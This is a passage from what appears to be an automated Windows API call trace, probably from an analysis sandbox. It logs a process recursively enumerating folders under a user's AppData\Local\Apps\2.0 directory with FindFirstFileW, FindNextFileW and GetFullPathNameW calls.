nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0153.131] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65fb9720, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a3a0420, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a3a0420, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="6NG60CXZ.9GJ", cAlternateFileName="")) returned 1 [0153.131] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0153.132] FindClose (in: hFindFile=0xbe15e8 | out: hFindFile=0xbe15e8) returned 1 [0153.132] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eb9c) returned 1 [0153.132] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eba8) returned 1 [0153.132] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949eb8c) returned 1 [0153.132] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ", nBufferLength=0x105, lpBuffer=0x949e694, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ", lpFilePart=0x0) returned 0x53 [0153.132] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\", nBufferLength=0x105, lpBuffer=0x949e668, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\", lpFilePart=0x0) returned 0x54 [0153.132] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\*", lpFindFileData=0x949e8b4 | out: lpFindFileData=0x949e8b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65fb9720, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a3a0420, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a3a0420, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xbe15e8 [0153.132] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65fb9720, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a3a0420, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a3a0420, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0153.132] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6a3a0420, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a3a0420, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a3a0420, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec", cAlternateFileName="GOOGAP~1.000")) returned 1 [0153.133] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6a3a0420, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a3a0420, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a3a0420, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec", cAlternateFileName="GOOGAP~1.000")) returned 0 [0153.133] FindClose (in: hFindFile=0xbe15e8 | out: hFindFile=0xbe15e8) returned 1 [0153.133] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eb4c) returned 1 [0153.133] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eb58) returned 1 [0153.133] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949eb8c) returned 1 [0153.133] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ", nBufferLength=0x105, lpBuffer=0x949e694, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ", lpFilePart=0x0) returned 0x53 [0153.133] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\", nBufferLength=0x105, lpBuffer=0x949e668, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\", lpFilePart=0x0) returned 0x54 [0153.133] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\*", lpFindFileData=0x949e8b4 | out: lpFindFileData=0x949e8b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65fb9720, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a3a0420, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a3a0420, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xbe15e8 [0153.133] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65fb9720, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a3a0420, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a3a0420, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0153.133] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6a3a0420, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a3a0420, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a3a0420, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec", cAlternateFileName="GOOGAP~1.000")) returned 1 [0153.134] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0153.134] FindClose (in: hFindFile=0xbe15e8 | out: hFindFile=0xbe15e8) returned 1 [0153.134] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eb4c) returned 1 [0153.134] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eb58) returned 1 [0153.134] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949eb3c) returned 1 [0153.134] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec", nBufferLength=0x105, lpBuffer=0x949e644, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec", lpFilePart=0x0) returned 0x8a [0153.134] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\", nBufferLength=0x105, lpBuffer=0x949e618, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\", lpFilePart=0x0) returned 0x8b [0153.134] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\*", lpFindFileData=0x949e864 | out: lpFindFileData=0x949e864*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6a3a0420, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a3a0420, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a3a0420, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xbe15e8 [0153.134] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949e874 | out: lpFindFileData=0x949e874*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6a3a0420, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a3a0420, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a3a0420, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0153.135] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949e874 | out: lpFindFileData=0x949e874*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6a3a0420, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a3a0420, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a3a0420, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Data", cAlternateFileName="")) returned 1 [0153.135] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949e874 | out: lpFindFileData=0x949e874*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6a3a0420, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a3a0420, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a3a0420, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Data", cAlternateFileName="")) returned 0 [0153.135] FindClose (in: hFindFile=0xbe15e8 | out: hFindFile=0xbe15e8) returned 1 [0153.135] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eafc) returned 1 [0153.135] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eb08) returned 1 [0153.135] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949eb3c) returned 1 [0153.135] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec", nBufferLength=0x105, lpBuffer=0x949e644, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec", lpFilePart=0x0) returned 0x8a [0153.135] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\", nBufferLength=0x105, lpBuffer=0x949e618, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\", lpFilePart=0x0) returned 0x8b [0153.135] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\*", lpFindFileData=0x949e864 | out: lpFindFileData=0x949e864*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6a3a0420, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a3a0420, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a3a0420, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xbe15e8 [0153.135] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949e874 | out: lpFindFileData=0x949e874*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6a3a0420, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a3a0420, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a3a0420, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0153.136] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949e874 | out: lpFindFileData=0x949e874*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6a3a0420, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a3a0420, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a3a0420, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Data", cAlternateFileName="")) returned 1 [0153.136] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949e874 | out: lpFindFileData=0x949e874*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0153.136] FindClose (in: hFindFile=0xbe15e8 | out: hFindFile=0xbe15e8) returned 1 [0153.136] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eafc) returned 1 [0153.136] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eb08) returned 1 [0153.136] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949eaec) returned 1 [0153.136] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\Data", nBufferLength=0x105, lpBuffer=0x949e5f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\Data", lpFilePart=0x0) returned 0x8f [0153.136] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\Data\\", nBufferLength=0x105, lpBuffer=0x949e5c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\Data\\", lpFilePart=0x0) returned 0x90 [0153.136] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\Data\\*", lpFindFileData=0x949e814 | out: lpFindFileData=0x949e814*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6a3a0420, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a3a0420, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a3a0420, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xbe15e8 [0153.136] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949e824 | out: lpFindFileData=0x949e824*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6a3a0420, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a3a0420, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a3a0420, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0153.137] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949e824 | out: lpFindFileData=0x949e824*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6a3a0420, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a3a0420, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a3a0420, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0153.137] FindClose (in: hFindFile=0xbe15e8 | out: hFindFile=0xbe15e8) returned 1 [0153.137] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eaac) returned 1 [0153.137] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eab8) returned 1 [0153.137] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949eaec) returned 1 [0153.137] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\Data", nBufferLength=0x105, lpBuffer=0x949e5f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\Data", lpFilePart=0x0) returned 0x8f [0153.137] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\Data\\", nBufferLength=0x105, lpBuffer=0x949e5c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\Data\\", lpFilePart=0x0) returned 0x90 [0153.137] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\Data\\*", lpFindFileData=0x949e814 | out: lpFindFileData=0x949e814*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6a3a0420, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a3a0420, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a3a0420, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xbe15e8 [0153.137] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949e824 | out: lpFindFileData=0x949e824*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6a3a0420, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a3a0420, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a3a0420, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0153.137] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949e824 | out: lpFindFileData=0x949e824*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6a3a0420, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a3a0420, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a3a0420, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0153.138] FindClose (in: hFindFile=0xbe15e8 | out: hFindFile=0xbe15e8) returned 1 [0153.138] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eaac) returned 1 [0153.138] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eab8) returned 1 [0153.138] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ec2c) returned 1 [0153.138] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX", nBufferLength=0x105, lpBuffer=0x949e734, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX", lpFilePart=0x0) returned 0x41 [0153.138] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\", nBufferLength=0x105, lpBuffer=0x949e708, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\", lpFilePart=0x0) returned 0x42 [0153.138] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\*", lpFindFileData=0x949e954 | out: lpFindFileData=0x949e954*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65f935c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x65f935c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x65f935c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xbe15e8 [0153.138] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949e964 | out: lpFindFileData=0x949e964*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65f935c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x65f935c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x65f935c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0153.138] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949e964 | out: lpFindFileData=0x949e964*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65f935c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a37a2c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="YVORLGOR.PNT", cAlternateFileName="")) returned 1 [0153.139] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949e964 | out: lpFindFileData=0x949e964*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65f935c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a37a2c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="YVORLGOR.PNT", cAlternateFileName="")) returned 0 [0153.139] FindClose (in: hFindFile=0xbe15e8 | out: hFindFile=0xbe15e8) returned 1 [0153.139] SetThreadErrorMode (dwNewMode=0x0, 